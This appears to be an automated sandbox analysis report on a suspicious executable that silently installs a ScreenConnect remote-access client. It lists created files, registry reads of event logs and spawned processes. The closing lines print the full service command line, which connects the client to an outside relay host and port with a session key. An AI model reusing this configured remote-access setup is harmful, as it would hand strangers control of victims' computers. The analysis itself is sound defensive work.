                                  Source: rundll32.exe, 00000005.00000003.2166340137.0000000004F83000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2166340137.0000000004F14000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2166528725.0000000004D43000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drString found in binary or memory: http://wixtoolset.org/releases/
                                  Source: tiG6Ep202n.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://www.digicert.com/CPS0
                                  Source: ScreenConnect.WindowsCredentialProvider.dll.3.drString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                                  Source: ScreenConnect.Core.dll.3.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
                                  Source: qmgr.db.10.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
                                  Source: svchost.exe, 0000000A.00000003.2233323680.0000027B7C2D0000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:

                                  Spam, unwanted Advertisements and Ransom Demands

                                  barindex
                                  Reads the Security eventlog
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnectJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnectJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnectJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnectJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnectJump to behavior
                                  Reads the System eventlog
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnectJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnectJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnectJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnectJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior

                                  System Summary

                                  barindex
                                  Detected potential unwanted application
                                  Source: tiG6Ep202n.exePE Siganture Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeCode function: 8_2_04F818F0 CreateProcessAsUserW,8_2_04F818F0
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\6699fd.msiJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{BD3FDC30-5D5E-2216-6CDD-B291951C7FFE}Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9C5F.tmpJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9C7F.tmpJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA097.tmpJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\6699ff.msiJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\6699ff.msiJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{BD3FDC30-5D5E-2216-6CDD-B291951C7FFE}Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{BD3FDC30-5D5E-2216-6CDD-B291951C7FFE}\DefaultIconJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Installer\wix{BD3FDC30-5D5E-2216-6CDD-B291951C7FFE}.SchedServiceConfig.rmiJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (a532d472f1ff1d4e)Jump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (a532d472f1ff1d4e)\3dcrjuoq.tmpJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (a532d472f1ff1d4e)\3dcrjuoq.newcfgJump to behavior
                                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
                                  Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI9C7F.tmpJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeCode function: 8_2_00BFD5888_2_00BFD588
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeCode function: 8_2_048D7CB88_2_048D7CB8
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeCode function: 8_2_048DE5988_2_048DE598
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeCode function: 8_2_048DCA088_2_048DCA08
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeCode function: 8_2_048DCA088_2_048DCA08
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeCode function: 8_2_048DE5988_2_048DE598
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD3441EE0D9_2_00007FFD3441EE0D
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD344171029_2_00007FFD34417102
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD3441EE4D9_2_00007FFD3441EE4D
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD3441EE689_2_00007FFD3441EE68
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD344227629_2_00007FFD34422762
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD3441A0AD9_2_00007FFD3441A0AD
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD344110CF9_2_00007FFD344110CF
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD344110D79_2_00007FFD344110D7
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD3441BB779_2_00007FFD3441BB77
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD3441837D9_2_00007FFD3441837D
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD3441BB859_2_00007FFD3441BB85
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD347269819_2_00007FFD34726981
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD347203F29_2_00007FFD347203F2
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD34726B949_2_00007FFD34726B94
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD347276499_2_00007FFD34727649
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD3472B5819_2_00007FFD3472B581
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD347295969_2_00007FFD34729596
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD3472F9FA9_2_00007FFD3472F9FA
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD3472FAF29_2_00007FFD3472FAF2
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD34726B489_2_00007FFD34726B48
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFD343FEE0D11_2_00007FFD343FEE0D
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFD343FA0AD11_2_00007FFD343FA0AD
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFD343FD24011_2_00007FFD343FD240
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFD343FEE4D11_2_00007FFD343FEE4D
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFD343FEE6811_2_00007FFD343FEE68
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFD343F10D711_2_00007FFD343F10D7
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFD343F10CF11_2_00007FFD343F10CF
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFD343FBB7711_2_00007FFD343FBB77
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFD343FBB8511_2_00007FFD343FBB85
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFD347030C011_2_00007FFD347030C0
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFD3470F4D211_2_00007FFD3470F4D2
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFD3470E72611_2_00007FFD3470E726
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFD3470635011_2_00007FFD34706350
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFD3470079011_2_00007FFD34700790
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFD347065C411_2_00007FFD347065C4
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFD347071F911_2_00007FFD347071F9
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFD34706FBB11_2_00007FFD34706FBB
                                  Source: tiG6Ep202n.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Source: tiG6Ep202n.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Source: tiG6Ep202n.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Source: tiG6Ep202n.exeStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Source: tiG6Ep202n.exeStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Source: tiG6Ep202n.exe, 00000000.00000002.2171934486.0000000005860000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exe, 00000000.00000000.2138892674.0000000000FBF000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exe, 00000000.00000000.2138892674.0000000000FBF000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exe, 00000000.00000002.2150164164.0000000003140000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exe, 00000000.00000002.2173892307.0000000005C1C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exe, 00000000.00000002.2173892307.0000000005C1C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSfxCA.dllL vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exe, 00000000.00000002.2173892307.0000000005C1C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamewixca.dll\ vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exe, 00000000.00000002.2173892307.0000000005C1C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exe, 00000000.00000000.2138892674.0000000000A96000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exe, 00000000.00000000.2138892674.0000000000A96000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelibwebp.dllB vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exe, 00000000.00000000.2138892674.0000000000A96000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamezlib.dll2 vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exe, 00000000.00000000.2138892674.0000000000A96000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exe, 00000000.00000000.2138892674.0000000000A96000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exe, 00000000.00000002.2172036237.0000000005880000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamelibwebp.dllB vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exe, 00000000.00000002.2172036237.0000000005880000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamezlib.dll2 vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exe, 00000000.00000002.2172036237.0000000005880000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exe, 00000000.00000002.2199171848.00000000093E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsiexec.exe.muiX vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exe, 00000000.00000002.2199171848.00000000093E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsiexec.exeX vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exe, 00000000.00000002.2163030125.0000000004333000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exe, 00000000.00000002.2171382078.00000000057D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exeBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exeBinary or memory string: OriginalFilenamelibwebp.dllB vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exeBinary or memory string: OriginalFilenamezlib.dll2 vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exeBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exeBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exeBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exeBinary or memory string: OriginalFilenameSfxCA.dllL vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exeBinary or memory string: OriginalFilenamewixca.dll\ vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exeBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exeBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs tiG6Ep202n.exe
                                  Source: tiG6Ep202n.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  Source: 0.2.tiG6Ep202n.exe.5880000.7.raw.unpack, WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                                  Source: 0.0.tiG6Ep202n.exe.b1c3d4.5.raw.unpack, WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                                  Source: 0.2.tiG6Ep202n.exe.5880000.7.raw.unpack, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                                  Source: 0.2.tiG6Ep202n.exe.5880000.7.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                  Source: 0.2.tiG6Ep202n.exe.5880000.7.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                                  Source: 0.0.tiG6Ep202n.exe.b1c3d4.5.raw.unpack, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                                  Source: 0.0.tiG6Ep202n.exe.b1c3d4.5.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                  Source: 0.0.tiG6Ep202n.exe.b1c3d4.5.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                                  Source: classification engineClassification label: mal44.evad.winEXE@18/58@1/2
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)Jump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\tiG6Ep202n.exe.logJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeMutant created: NULL
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeFile created: C:\Users\user\AppData\Local\Temp\ScreenConnectJump to behavior
                                  Source: tiG6Ep202n.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  Source: tiG6Ep202n.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI9606.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6723343 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                  Source: tiG6Ep202n.exeReversingLabs: Detection: 26%
                                  Source: tiG6Ep202n.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2
                                  Source: tiG6Ep202n.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2)
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeFile read: C:\Users\user\Desktop\tiG6Ep202n.exeJump to behavior
                                  Source: unknownProcess created: C:\Users\user\Desktop\tiG6Ep202n.exe "C:\Users\user\Desktop\tiG6Ep202n.exe"
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\a532d472f1ff1d4e\ScreenConnect.ClientSetup.msi"
                                  Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 65BBBA74F7292B7FF205870D60C0A988 C
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI9606.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6723343 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 3D471D2A52DB95060FC9B91DC9E4C61F
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding BC39C5326F99970A8179C0B7FC0A805D E Global\MSI0000
                                  Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=sc.connectprotocol.es&p=8041&s=16dcb7ee-2b94-4a51-a426-55c28e344f1f&k=BgIAAACkAABSU0ExAAgAAAEAAQC1kWKbpg72shug%2fcuGWQB7IuEBcyNy1kcDtCeo3N0RY4axIPh%2fFMztLn0b%2bG2MIuQOrKGq0Xsvxj7WUcZ%2bdIiMwDt7qlLgFko33osOQisFILKOBROsqmoO0CYg%2fpKva7AaAU%2bym8ZeY9OkPYj7knkvh679kRKgwWM5tfC%2fbhzztt1d5pfIewfVI67rLcAGqXh1hUDy%2bbdI6LG6r8m8lQczrbhXAZJ%2fuvXvUGXN6ZWttC7E00yJiy6fPWNioX5EJ%2fn2uX9gCWU%2bpspAIXXJhOyEHV84BHAUT0rgC1re8M9Puttx9uDjI37OpBOLw%2f5qq735uizmWAgUfhfj%2fLZeRyvQ&t=OLD-01"
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe" "RunRole" "75df5a49-a7b2-4825-b91e-9f1189beb45e" "User"
